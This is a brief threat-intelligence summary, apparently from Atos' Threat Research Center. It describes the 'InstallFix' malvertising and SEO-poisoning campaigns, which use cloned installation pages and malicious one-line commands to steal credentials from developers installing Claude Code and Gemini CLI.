When installing AI turns risky: The rising scale of the campaigns targeting Claude code users

Report summary

The rapid adoption of Anthropic’s Claude Code LLM has been followed by a visible rise in targeted attacks aimed at developers and security practitioners. The common thing across these operations is not just brand impersonation, but an abuse of normal developer behavior: searching for installation guidance, trusting high-ranking search results, and pasting one-line commands into a terminal without deeply validating the source.

The most prominent of these operations is the so-called InstallFix campaign, which combines malvertising, SEO poisoning, and cloned websites and/or documentation to push victims toward malicious PowerShell or bash commands. In several cases, the attacker deliberately installs the legitimate tool in the foreground, so the victim assumes everything worked as expected while credential theft continues quietly in the background.

What makes these campaigns especially serious is the profile of the victim. Claude Code users are typically developers, security engineers, and cloud engineers working from privileged workstations. A successful compromise can expose valuable information like browser sessions, enterprise chat tokens, API keys, SSH keys, cloud credentials, cryptocurrency wallets, source code access, and secrets stored in environment variables or system keychains.

Atos’ Threat Research Center is actively monitoring multiple campaigns and groups involved in leveraging search engine results and AI popularity. The activity described in next sections of this article shows a broadening ecosystem of lures. While Claude Code is a central theme, the same infrastructure and tradecraft also appear around Gemini CLI and other developer tools. That suggests the campaign is less about one product alone and more about monetizing trust around fast-growing AI-assisted development workflows.

Read the full research here.